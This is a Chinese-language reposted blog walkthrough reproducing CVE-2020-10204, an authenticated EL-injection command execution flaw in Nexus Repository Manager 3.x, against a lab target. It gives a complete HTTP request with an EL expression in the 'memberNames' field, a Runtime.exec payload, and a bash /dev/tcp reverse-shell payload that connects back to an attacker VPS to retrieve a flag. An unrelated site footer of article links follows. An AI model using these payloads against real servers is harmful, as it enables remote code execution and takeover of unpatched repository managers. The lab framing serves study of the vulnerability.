nexus 命令执行 CVE-2020-10204复现
漏洞描述
Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的。
漏洞影响
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
漏洞复现
1、访问靶场IP 点击Sign进行登录 admin admin
2、抓包获取登录后的cookie及csrf属性。
3、改包,通过"memberNames"中3个233相乘的命令能否执行来判断漏洞存在
-
POST /service/rest/beta/repositories/go/group HTTP/1.1
-
Host: 靶场ip:端口
-
Content-Length: 203
-
X-Requested-With: XMLHttpRequest
-
X-Nexus-UI: true
-
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
-
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
-
Content-Type: application/json
-
Accept: */*
-
Origin: 靶场ip:端口
-
Sec-Fetch-Site: same-origin
-
Sec-Fetch-Mode: cors
-
Referer: 靶场ip:端口
-
Accept-Encoding: gzip, deflate, br
-
Accept-Language: zh-CN,zh;q=0.9
-
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
-
Connection: close
-
-
{
-
"name": "internal",
-
"online": true,
-
"storage":
-
{
-
"blobStoreName": "default",
-
"strictContentTypeValidation": true
-
},
-
"group":
-
{
-
"memberNames": ["$\\A{233*233*233}"]
-
}
-
}
上面数据包中的NX-ANTI-CSRF-TOKEN 和Cookie 的值修改为第2步中所抓数据包中对应的值。
可以看到命令被成功执行了。
4、将"memberNames"中的值改成命令执行的pyload,再次放包,下图中这个情况说明命令被成功执行了。
A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}
但是换成ls /tmp 之后,命令执行的结果并不会回显在返回的数据包中,所以想要获得flag,最方便的还是反弹shell了。
5、将命令修改为反弹shell的命令,VPS进行监听。
"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash>&/dev/tcp/IP/8888<&1')}"
6、反弹成功 ls /tmp获取flag。
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhgfecif
系列文章
更多
同类精品
更多
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
怎样阻止微信小程序自动打开
PHP中文网 06-13 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01